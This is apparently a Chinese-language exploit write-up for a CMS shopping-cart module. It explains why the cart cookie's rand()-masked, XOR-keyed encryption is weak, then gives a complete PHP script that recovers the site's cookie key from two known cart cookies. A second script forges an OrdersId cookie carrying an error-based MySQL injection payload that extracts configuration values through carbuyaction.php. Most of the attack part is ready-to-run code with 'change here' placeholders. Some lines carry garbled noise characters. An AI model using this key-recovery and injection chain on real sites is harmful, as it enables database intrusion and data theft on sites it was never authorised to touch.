www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中
先看一下这个 shopcar 类是如何生成 cookie 的
/**
 * Persists a shopping-cart value as a browser cookie named $key.
 *
 * Array values are first flattened by enCode() (the write-up says into an
 * a=yy&b=cc query-string form); scalar values are passed through as-is.
 * Either way the result goes through enCrypt(), and that output is what
 * the browser later sends back. Nothing here adds a MAC or signature: the
 * integrity of the cart rests entirely on the key setKey() applies inside
 * enCrypt(), so anyone who can produce a valid enCrypt() output controls
 * the cart state.
 *
 * @param string $key   cookie name
 * @param mixed  $value array (goes through enCode()) or scalar (used as-is)
 */
function saveCookie($key,$value)
{
    if(is_array($value))
    {
        $value = $this->enCrypt($this->enCode($value));
    }
    else
    {
        $value = $this->enCrypt($value);
    }
    // 36000 s (10 h) lifetime, site-wide path; no secure/httponly flags set.
    setcookie($key,$value,time()+36000,'/');
}
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
/**
 * Wraps a cookie value for saveCookie().
 *
 * Picks a per-call mask md5(rand(0, 32000)) -- only 32001 possible values,
 * and rand() is not a CSPRNG -- then, for each plaintext byte, appends the
 * current mask character IN THE CLEAR followed by plaintext ^ mask. Because
 * the mask travels inside the output, this step adds no secrecy: the only
 * secret in the pipeline is the key setKey() applies afterwards, and with a
 * known plaintext even that reduces to a 32001-way guess.
 *
 * @param string $txt plaintext (already enCode()'d when it was an array)
 * @return string base64(setKey(interleaved mask/masked bytes)); the
 *                pre-base64 length is twice the plaintext length
 */
function enCrypt($txt)
{
    // Seeding from microtime() only makes the mask guessable by time;
    // it does not widen the 32001-value mask space.
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // wrap the mask index at 32 (md5 hex length)
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        // mask char in the clear, then the masked plaintext char
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    return base64_encode($this->setKey($tmp));
}
/**
 * Repeating-key XOR of $txt with md5(strtolower($cfg_cookie_encode)).
 *
 * This is the only secret-dependent step of the cookie scheme. The key is
 * the 32-character lowercase-hex md5 of the site's $cfg_cookie_encode
 * (case-folded first, which can only shrink its entropy), restarted from
 * position 0 on every call. XOR is its own inverse, so
 * setKey(setKey($x)) === $x, and for any known (input, output) pair the
 * key stream is simply input ^ output -- which is exactly what an attacker
 * holding a cart cookie with known plaintext can compute.
 *
 * @param string $txt bytes to mask or unmask
 * @return string same-length XOR result
 */
function setKey($txt)
{
    global $cfg_cookie_encode;
    $encrypt_key = md5(strtolower($cfg_cookie_encode));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // wrap at 32, the md5 hex length
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
enCrypt 的参数 $txt 我们是可知的（就是 enCode 之后的购物车明文），返回值就是 cookie 的值，这个我们也是可知的。
然后看 enCrypt 调用 setKey 时的参数 $tmp：这个参数在某种意义上我们也是可知的，因为 $encrypt_key = md5(rand(0, 32000)) 只有 32001 种可能（rand 的上界是闭区间，枚举时别漏掉 32000），而 mask 字符本身就明文写在 $tmp 里，所以我们可以推出 32001 种可能的 $tmp；再把 cookie 做 base64 解码后逐字节异或回去，就得到 32001 种可能的 md5(strtolower($cfg_cookie_encode))。补充一下：我们的目的就是推测出 setKey 中 $encrypt_key 的值，拿到它之后才能任意构造购物车的 cookie。真正的 key 是 md5 的输出，一定是 32 个小写十六进制字符，按这个规则过滤（比只要求字母数字更严格）之后只剩下少量候选；然后再下一次订单拿到第二个 cookie（两次的随机 mask 不同，但站点 key 是同一个），同样算出一组候选，两组取交集就得到最终的 key。
具体代码如下：
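<?php
// Recovers md5(strtolower($cfg_cookie_encode)) -- the only real secret in
// shopcar.class.php's cookie scheme -- from cart cookies whose plaintext
// is known.
//
// enCrypt() masks the plaintext with md5(rand(0, 32000)) and writes each
// mask byte into the output next to the masked byte, so for a known
// plaintext there are only 32001 candidate pre-setKey() strings. setKey()
// is a repeating-key XOR, so XOR-ing each candidate against the
// base64-decoded cookie yields a candidate 32-byte key. The true key is
// md5() output (32 lowercase hex chars) and is the same for every cookie
// the site issues, so filtering candidates to ^[0-9a-f]{32}$ and
// intersecting the sets from two independently issued cookies leaves the
// real key (a wrong guess surviving both masks is vanishingly unlikely).
//
// Both cookies must have been produced from the SAME plaintext ($plantxt):
// the script reuses one plaintext for both. $plantxt must be at least 16
// bytes so the masking loop yields the 32 bytes reStrCode() needs.

$cookie1 = 'X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw=='; // first cart cookie -- change here
$cookie2 = 'ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ=='; // second cart cookie, from a separate order -- change here
$plantxt = 'id=2&price=0&units=fun&buynum=1&title=naduohua1'; // enCode() output the server encrypted -- change here

/**
 * XORs the first 32 bytes of a base64 cookie against a candidate
 * pre-setKey() string, giving the candidate setKey() key stream.
 *
 * @param string $code   base64-encoded cookie value as sent by the server
 * @param string $string candidate output of enCrypt()'s masking loop
 * @return string|null   32-byte candidate key, or null when either input
 *                       is too short to cover the whole key
 */
function reStrCode($code, $string)
{
    $raw = base64_decode($code);
    if ($raw === false || strlen($raw) < 32 || strlen($string) < 32) {
        return null;
    }
    $key = '';
    for ($i = 0; $i < 32; $i++) {
        $key .= $string[$i] ^ $raw[$i];
    }
    return $key;
}

/**
 * Enumerates every mask enCrypt() could have used and returns the
 * candidate setKey() keys that look like an md5 hex digest.
 *
 * @param string $cookie  base64 cookie value
 * @param string $plantxt plaintext the server encrypted (enCode() output)
 * @param int    $maxRand inclusive upper bound of the target's rand() call
 * @return string[] candidate 32-char lowercase-hex keys (may contain repeats)
 */
function getKeys($cookie, $plantxt, $maxRand = 32000)
{
    $results = array();
    $len = strlen($plantxt);
    // rand(0, N) is inclusive, hence <= rather than <.
    for ($j = 0; $j <= $maxRand; $j++) {
        // Mirror of enCrypt(): md5() of the integer rand() returned, each
        // mask char emitted in the clear followed by plaintext ^ mask char.
        $mask = md5($j);
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < $len; $i++) {
            $ctr = $ctr == strlen($mask) ? 0 : $ctr;
            $tmp .= $mask[$ctr] . ($plantxt[$i] ^ $mask[$ctr++]);
        }
        $result = reStrCode($cookie, $tmp);
        // The real key is md5() output: exactly 32 lowercase hex chars.
        // Anything else is a wrong guess, so discard it here.
        if ($result !== null && preg_match('/^[0-9a-f]{32}$/', $result)) {
            echo $result . "\n";
            $results[] = $result;
        }
    }
    return $results;
}

$results1 = getKeys($cookie1, $plantxt);
$results2 = getKeys($cookie2, $plantxt);

print "\n--------------------real key--------------------------\n";
// A key that survives both independent masks is the site's key.
foreach (array_unique(array_intersect($results1, $results2)) as $realKey) {
    echo $realKey . "\n";
}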
cookie1 和 cookie2 是我下了两次订单后分别生成的 cookie（两次订单要是同样的商品和数量，这样两次的明文相同，脚本里才能共用一个 plantxt），
plantxt 可以根据页面自己推算，大概就是这个格式：id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出 md5(strtolower($cfg_cookie_encode))
得到这个 key 之后，我们就可以构造任意购物车的 cookie
接着看
20 class MemberShops, a" t, x0 T) g7 o: q
21 {5 v# { c. D* }! H+ Z
22 var $OrdersId;
- h( D6 u4 T3 C0 l3 v6 x" q23 var $productsId;
, i' ^7 Z" ~! v" l( N; ?24. I! E& L* T9 O
/**
 * Restores the current order id from the "OrdersId" cookie, creating a new
 * order only when that cookie is absent or empty.
 *
 * NOTE(review): the cookie value is trusted as-is after getCookie()
 * (presumably the inverse of saveCookie()/enCrypt(), not shown here); it
 * is never validated as an order number, so whoever can produce a valid
 * cookie controls $this->OrdersId -- which carbuyaction.php later
 * interpolates straight into an SQL string.
 */
function __construct()
{
    $this->OrdersId = $this->getCookie("OrdersId");
    if(empty($this->OrdersId))
    {
        $this->OrdersId = $this->MakeOrders();
    }
}
发现 OrdersId 是直接从 cookie 里面取出来的
然后看
/plus/carbuyaction.php 中的
29 $cart = new MemberShops();8 Z; @) Q2 `$ g' K
39 $OrdersId = $cart->OrdersId; //本次记录的订单号% T; m$ K! H. z _/ n; Q ^
……
9 w% D9 \: D, |5 g# n7 ~3 }173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);$ x* C( {! u/ ~) c8 H
接着我们就可以注入了：第 173 行把从 cookie 解出来的 $OrdersId 直接拼进 SQL 字符串，没有任何转义或参数化，所以只要能伪造出合法的 cookie，oid 的值就完全由我们控制。
通过利用下面代码生成cookie:
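<?php
// Forges a shopcar cookie once md5(strtolower($cfg_cookie_encode)) is
// known, by re-running the target's own enCrypt()/setKey() pipeline over an
// attacker-chosen plaintext. The plaintext becomes the OrdersId value that
// carbuyaction.php interpolates unescaped into
//   SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1
// so it carries an error-based (rand()/group by duplicate-key) injection.
//
// Payload notes: inside a double-quoted PHP string `\'` is NOT an escape,
// so MySQL sees @`\'` -- a user variable with a backtick-quoted name, used
// to smuggle a quote past naive quote filtering. `#@__` is the same table
// prefix placeholder the target's own query uses, so it is presumably
// expanded by the DB layer before execution. The substring is cut at 62
// chars, presumably so that together with the floor() prefix the group key
// still fits in what the duplicate-entry error message reports back.
$txt = "1' or 1=@`\'` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\'` or '1'='1";
$encrypt_key = "9f09293b7419ed68448fb51d5b174834"; // md5(strtolower($cfg_cookie_encode)) recovered earlier -- change here

/**
 * The target's setKey(): repeating-key XOR with the site key. XOR is its
 * own inverse, so the same function both forges and decodes.
 *
 * @param string $txt bytes to mask
 * @return string masked bytes, same length as $txt
 */
function setKey($txt)
{
    global $encrypt_key;
    $ctr = 0;
    $tmp = '';
    $keyLen = strlen($encrypt_key);
    for ($i = 0; $i < strlen($txt); $i++) {
        $ctr = $ctr == $keyLen ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}

/**
 * The target's enCrypt(): interleaves a 32-hex-char mask with the masked
 * plaintext, applies setKey() and base64-encodes. The mask ships inside
 * the cookie, so presumably any value in 0..32000 is accepted by the
 * server; passing $j makes the choice explicit and reproducible.
 *
 * @param string   $txt plaintext to wrap
 * @param int|null $j   mask seed (md5($j)); null picks one at random like
 *                      the target does
 * @return string base64 cookie value
 */
function enCrypt($txt, $j = null)
{
    if ($j === null) {
        $j = rand(0, 32000);
    }
    $mask = md5($j);
    $ctr = 0;
    $tmp = '';
    for ($i = 0; $i < strlen($txt); $i++) {
        $ctr = $ctr == strlen($mask) ? 0 : $ctr;
        // mask char in the clear, then plaintext ^ mask char
        $tmp .= $mask[$ctr] . ($txt[$i] ^ $mask[$ctr++]);
    }
    return base64_encode(setKey($tmp));
}

// The original script retried random masks until the base64 contained no
// '+' (it does not say why; presumably the cookie is read back through a
// path that turns '+' into a space) and tested it with !strpos(), which
// misses a '+' at offset 0. Walking the 32001 possible masks in order is
// bounded, deterministic and catches offset 0. '/' and '=' are left alone,
// as in the original.
$dest = null;
for ($j = 0; $j <= 32000; $j++) {
    $candidate = enCrypt($txt, $j);
    if (strpos($candidate, '+') === false) {
        $dest = $candidate;
        break;
    }
}
if ($dest === null) {
    fwrite(STDERR, "no mask in 0..32000 yields a '+'-free cookie for this payload; adjust the payload\n");
    exit(1);
}
echo $dest . "\n";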